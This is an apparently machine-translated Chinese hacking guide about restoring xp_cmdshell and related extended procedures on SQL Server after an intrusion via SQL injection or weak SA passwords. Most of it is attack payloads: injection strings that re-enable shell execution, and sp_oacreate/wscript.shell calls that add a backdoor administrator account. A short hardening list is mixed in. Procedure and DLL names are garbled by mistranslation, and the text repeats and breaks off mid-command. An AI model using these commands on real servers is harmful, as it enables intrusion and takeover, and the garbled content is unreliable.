SQL Server blocks access to 'sys. xp_mongoshell' during the 'xp _ mongoshell' process, because this component has been disabled as part of the server's security configuration. The system administrator can enable 'xp _ javasshell' by using sp_configure '. For more information about enabling 'xp _ external shell', see "peripheral application configurator" in SQL Server books online ". Sql2005 deletes xp_cmdshell in the default settings, which also creates some difficulties during the injection process. Later, I checked the mssql2005 manual to find out the original situation: Use the following sentence to solve the problem. ; Exec sp_configure 'show advanced options', 1; reconfigure; Exec sp_configure 'xp _ Your shell', 1; reconfigure ;-- Close the same. Just change the "1" behind the above to "0. ; Exec sp_configure 'show advanced options', 1; reconfigure; Exec sp_configure 'xp _ cmdshell', 0; reconfigure ;-- If mongoshell doesn't work, run it again: ; DBCC addextendedproc ("xp_cmdshell", "xplog70.dll ");-- Or ; Sp_addextendedproc xp_cmdshell, @ dllname = 'loglog70. dll' To restore the shell. Yancheng network company 1433sql intrusion recovery xp_mongoshell method summary How to enable xp_cmdshell in SQL Server 2005 Exec sp_configure 'show advanced options', 1; reconfigure; Exec sp_configure 'xp _ Your shell', 1; reconfigure; How to enable 'openrowset' in sql2005: Exec sp_configure 'show advanced options', 1; reconfigure; Exec sp_configure 'ad hoc distributed queries ', 1; reconfigure; How to enable 'SP _ oacreate' in sql2005: Exec sp_configure 'show advanced options', 1; reconfigure; Exec sp_configure 'ole automation procedures ', 1; reconfigure; Overcome SA's various difficulties Restore the execution of xp_mongoshell in common cases 1. The Stored Procedure 'master... xpcmdshell' cannot be found '. Recovery Method: After querying the separator connection, Step 1: Execute exec sp_addextendedproc xp_cmdshell, @ dllname = 'xplog70. dll 'declare @ o int Step 2: Execute sp_addextendedproc 'xp _ cmdshell', 'sql70. dll' Then press F5 to complete the command execution. 2. Unable to load DLL xpsql70.dll or a DLL referenced by the DLL. Cause 126 (the specified module cannot be found .) Recovery Method: After querying the separator connection, Step 1: Execute sp_dropextendedproc "xp_cmdshell" Step 2: Execute sp_addextendedproc 'xp _ cmdshell', 'sql70. dll' Then press F5 to complete the command execution. 3. The xp_cmdshell function cannot be found in xpweb70.dll. Cause: 127 (the specified program cannot be found .) Recovery Method: After querying the separator connection, Step 1: Execute exec sp_dropextendedproc 'xp _ export shell' Step 2: Execute exec sp_addextendedproc 'xp _ cmdshell', 'xpweb70. dll' Then press F5 to complete the command execution. Iv. Ultimate Method. If none of the above methods can be recovered, try the following method to add an account: After querying the separator connection, 2000servser system: Declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c:/winnt/system32/cmd.exe/C net user Dell huxifeng007/add' Declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c:/winnt/system32/cmd.exe/C net localgroup administrators Dell/add' XP or 2003server system: Declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c:/Windows/system32/cmd.exe/C net user Dell huxifeng007/add' Declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c:/Windows/system32/cmd.exe/C net localgroup administrators Dell/add' -------------- Xp_mongoshell's new Recovery Method Delete Drop procedure sp_addextendedproc Drop procedure sp_oacreate Exec sp_dropextendedproc 'xp _ export shell' Restore DBCC addextendedproc ("sp_oacreate", "odsole70.dll ") DBCC addextendedproc ("xp_mongoshell", "xplog70.dll ") In this way, the data can be directly restored without worrying about the existence of sp_addextendedproc. ----------------------------- Delete the xp_mongoshell statement in the extended stored procedure: Exec sp_dropextendedproc 'xp _ export shell' Restore shell SQL statements Exec sp_addextendedproc xp_cmdshell, @ dllname = 'loglog70. dll' Enable the SQL statement of Shell Exec sp_addextendedproc xp_cmdshell, @ dllname = 'loglog70. dll' Determine whether the storage extension exists Select count (*) from Master. DBO. sysobjects where xtype = 'X' and name = 'xp _ cmdshell' If the returned result is 1, OK is returned. Restore xp_mongoshell Exec master. DBO. addextendedproc 'xp _ Your shell', 'xp log70. dll '; select count (*) from master. DBO. sysobjects where xtype = 'X' and name = 'xp _ Your shell' If the returned result is 1, OK is returned. Otherwise, upload xplog7.0.dll. Exec master. DBO. addextendedproc 'xp _ mongoshell', 'c:/winnt/system32/xplog70.dll' Block SQL statements of Shell Sp_dropextendedproc "xp_cmdshell ---------------- Delete dangerous SQL storage: Drop procedure sp_makewebtask Exec master .. sp_dropextendedproc xp_cmdshell Exec master .. sp_dropextendedproc xp_dirtree Exec master .. sp_dropextendedproc xp_fileexist Exec master .. sp_dropextendedproc xp_terminate_process Exec master .. sp_dropextendedproc sp_oamethod Exec master .. sp_dropextendedproc sp_oacreate Exec master .. sp_dropextendedproc xp_regaddmultistring Exec master .. sp_dropextendedproc xp_regdeletekey Exec master .. sp_dropextendedproc xp_regdeletevalue Exec master .. sp_dropextendedproc xp_regenumkeys Exec master .. sp_dropextendedproc xp_regenumvalues Exec master .. sp_dropextendedproc sp_add_job Exec master .. sp_dropextendedproc sp_addtask Exec master .. sp_dropextendedproc xp_regread Exec master .. sp_dropextendedproc xp_regwrite Exec master .. sp_dropextendedproc xp_readwebtask Exec master .. sp_dropextendedproc xp_makewebtask Exec master .. sp_dropextendedproc xp_regremovemultistring Exec master .. sp_dropextendedproc sp_oacreate Drop procedure sp_addextendedproc /* Restore the extended storage process Restore sp_addextendedproc first. The statement is as follows: SQL code: Create procedure sp_addextendedproc --- 1996/08/30 20:13 @ Functname nvarchar (517),/* (owner.) Name of function to call */@ dllname varchar (255)/* Name of DLL containing function */ Set implicit_transactions off If @ trancount> 0 Begin Raiserror (15002,-1,-1, 'SP _ addextendedproc ') Return (1) End DBCC addextendedproc (@ functname, @ dllname) Return (0) -- sp_addextendedproc Go Restore all the above Extended Stored Procedures SQL code: Use master Exec sp_addextendedproc xp_cmdshell, 'xp _ cmdshell. dll' Exec sp_addextendedproc xp_dirtree, 'xpstar. dll' Exec sp_addextendedproc xp_enumgroups, 'xp log70. dll' Exec sp_addextendedproc xp_fixeddrives, 'xpstar. dll' Exec sp_addextendedproc xp_loginconfig, 'xplog70. dll' Exec sp_addextendedproc xp_enumerrorlogs, 'xpstar. dll' Exec sp_addextendedproc xp_getfiledetails, 'xpstar. dll' Exec sp_addextendedproc sp_oacreate, 'odsole70. dll' Exec sp_addextendedproc sp_oadestroy, 'odsole70. dll' Exec sp_addextendedproc sp_oageterrorinfo, 'odsole70. dll' Exec sp_addextendedproc sp_oagetproperty, 'odsole70. dll' Exec sp_addextendedproc sp_oamethod, 'odsole70. dll' Exec sp_addextendedproc sp_oasetproperty, 'odsole70. dll' Exec sp_addextendedproc sp_oastop, 'odsole70. dll' Exec sp_addextendedproc xp_regaddmultistring, 'xpstar. dll' Exec sp_addextendedproc xp_regdeletekey, 'xpstar. dll' Exec sp_addextendedproc xp_regdeletevalue, 'xpstar. dll' Exec sp_addextendedproc xp_regenumvalues, 'xpstar. dll' Exec sp_addextendedproc xp_regread, 'xpstar. dll' Exec sp_addextendedproc xp_regremovemultistring, 'xpstar. dll' Exec sp_addextendedproc xp_regwrite, 'xpstar. dll' Exec sp_addextendedproc xp_availablemedia, 'xpstar. dll' SQL Server blocks access to 'sys. xp_mongoshell' during the 'xp _ mongoshell' process, because this component has been disabled as part of the server's security configuration. The system administrator can enable 'xp _ javasshell' by using sp_configure '. For more information about enabling 'xp _ external shell', see "peripheral application configurator" in SQL Server books online ". Friends who often scan SQL weak passwords should have encountered this problem! Next, we will use SQL statements to solve this problem. Statement executed by the analyzer: Exec sp_configure 'show advanced options', 1; reconfigure; Exec sp |